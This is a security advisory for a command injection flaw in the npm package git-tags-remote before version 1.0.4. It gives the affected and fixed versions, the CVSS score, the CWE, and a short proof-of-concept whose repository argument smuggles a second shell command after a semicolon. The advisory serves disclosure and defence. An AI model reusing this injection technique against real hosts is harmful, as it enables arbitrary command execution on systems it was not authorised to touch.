exploitDog
GHSA-gm9x-q798-hmr4

Published: 29 Jul 2020
Source: github
GitHub: Reviewed
CVSS3: 7.2

Description

Command Injection in git-tags-remote

All versions of git-tags-remote prior to 1.0.4 are vulnerable to Command Injection. The package does not sanitize the repository input and passes it directly to an exec call in the get function, so the value is interpreted by the system shell. This allows an attacker to execute arbitrary commands on the host if the repo value passed to the function is user-controlled.

The following proof-of-concept creates a file in /tmp:

const gitTagsRemote = require('git-tags-remote');

// The repository string is passed straight to the shell; everything after the ';'
// runs as a separate command with the privileges of the Node process.
gitTagsRemote
  .get('https://github.com/sh0ji/git-tags-remote.git; echo "Injection Success" > /tmp/command-injection.test')
  .then(tags => console.log(tags));

Packages

Name: git-tags-remote (npm)
Affected versions: < 1.0.4
Fixed version: 1.0.4

Severity: 7.2 High (CVSS3)

Weakness: CWE-78 (Improper Neutralization of Special Elements used in an OS Command, 'OS Command Injection')
